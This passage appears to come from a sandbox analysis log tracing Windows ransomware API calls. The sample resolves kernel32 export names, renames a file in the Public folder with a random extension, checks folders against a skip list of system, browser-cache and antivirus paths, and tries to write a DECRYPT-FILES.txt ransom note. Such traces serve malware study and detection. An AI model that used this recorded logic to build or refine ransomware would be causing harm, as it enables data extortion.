returned="CreateMutexA" [0187.053] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0187.053] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0187.053] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0187.053] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0187.053] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0187.053] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0187.053] lstrlenA (lpString="CREATEPIPE") returned 10 [0187.053] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0187.053] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0187.054] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0187.054] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0187.054] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0187.054] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0187.054] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0187.054] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0187.054] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0187.054] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0187.054] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0187.054] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0187.054] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0187.054] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0187.054] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0187.054] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0187.054] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0187.054] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0187.054] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0187.054] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0187.054] lstrlenA (lpString="CREATETHREAD") returned 12 [0187.054] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0187.055] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0187.055] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0187.055] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0187.055] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0187.055] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0187.055] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0187.055] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0187.055] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0187.055] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0187.055] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0187.055] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0187.055] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0187.055] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0187.055] lstrlenA (lpString="CTRLROUTINE") returned 11 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0187.055] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0187.055] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0187.055] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0187.055] lstrlenA (lpString="DEBUGBREAK") returned 10 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0187.055] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0187.055] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0187.055] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0187.056] lstrlenA (lpString="DECODEPOINTER") returned 13 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0187.056] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0187.056] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0187.056] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0187.056] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0187.056] lstrlenA (lpString="DELETEATOM") returned 10 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0187.056] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0187.056] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0187.056] lstrlenA (lpString="DELETEFIBER") returned 11 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0187.056] lstrlenA (lpString="DELETEFILEA") returned 11 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0187.056] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0187.056] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0187.056] lstrlenA (lpString="DELETEFILEW") returned 11 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0187.056] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0187.056] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0187.056] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0187.056] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0187.056] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0187.056] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0187.057] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0187.057] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0187.057] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0187.057] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0187.057] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0187.057] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0187.057] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0187.057] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0187.057] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0187.057] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0187.057] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0187.057] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0187.057] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0187.057] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0187.057] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0187.057] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0187.057] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0187.057] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0187.057] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0187.057] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0187.058] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0187.058] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0187.058] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0187.058] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0187.058] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0187.058] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0187.058] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0187.058] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0187.058] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0187.058] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0187.058] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0187.058] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0187.058] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0187.058] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0187.058] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0187.058] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0187.058] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0187.058] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0187.058] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0187.058] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0187.058] lstrlenW (lpString="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.umztq") returned 76 [0187.058] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.umztq.mSse4D") returned 83 [0187.058] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.umztq" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.umztq"), lpNewFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.umztq.mSse4D" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.umztq.msse4d"), dwFlags=0x0) returned 1 [0187.061] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.062] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.062] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.062] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xb1948040, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x940108, dwReserved0=0x0, dwReserved1=0x0, cFileName="win7_scenic-demoshort_raw.wtv.umztq", cAlternateFileName="WIN7_S~1.UMZ")) returned 0 [0187.062] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0187.062] CloseHandle (hObject=0x25c) returned 1 [0187.062] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xb196e1a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb196e1a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Media\\", cAlternateFileName="SAMPLE~1")) returned 0 [0187.062] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0187.062] CloseHandle (hObject=0x254) returned 1 [0187.062] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb196e1a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb196e1a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0187.062] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0187.062] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0187.062] lstrcatW (in: lpString1="Videos", lpString2="\\" | out: lpString1="Videos\\") returned="Videos\\" [0187.063] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Videos\\" | out: lpString1="C:\\Users\\Public\\Videos\\") returned="C:\\Users\\Public\\Videos\\" [0187.063] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="\\Program Files") returned 0x0 [0187.063] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch=":\\Windows") returned 0x0 [0187.063] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="\\Games\\") returned 0x0 [0187.063] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="\\Tor Browser\\") returned 0x0 [0187.063] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="\\ProgramData\\") returned 0x0 [0187.063] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0187.063] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0187.063] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0187.063] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="\\All Users") returned 0x0 [0187.063] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="\\IETldCache\\") returned 0x0 [0187.063] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="\\Local Settings\\") returned 0x0 [0187.063] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="\\AppData\\Local") returned 0x0 [0187.063] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="AhnLab") returned 0x0 [0187.063] StrStrW (lpFirst="C:\\Users\\Public\\Videos\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0187.063] lstrlenW (lpString="C:\\Users\\Public\\Videos\\") returned 23 [0187.063] lstrlenW (lpString="0a16c9.tmp") returned 10 [0187.063] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Videos\\\\0a16c9.tmp") returned 34 [0187.063] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\videos\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0187.065] lstrlenW (lpString="C:\\Users\\Public\\Videos\\") returned 23 [0187.065] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0187.065] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Videos\\\\DECRYPT-FILES.txt") returned 41 [0187.065] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\videos\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0187.065] lstrlenW (lpString="C:\\Users\\Public\\Videos\\") returned 23 [0187.065] lstrcatW (in: lpString1="C:\\Users\\Public\\Videos\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Videos\\*") returned="C:\\Users\\Public\\Videos\\*" [0187.065] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf233d600, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf233d600, ftLastWriteTime.dwHighDateTime=0x1d5981b, 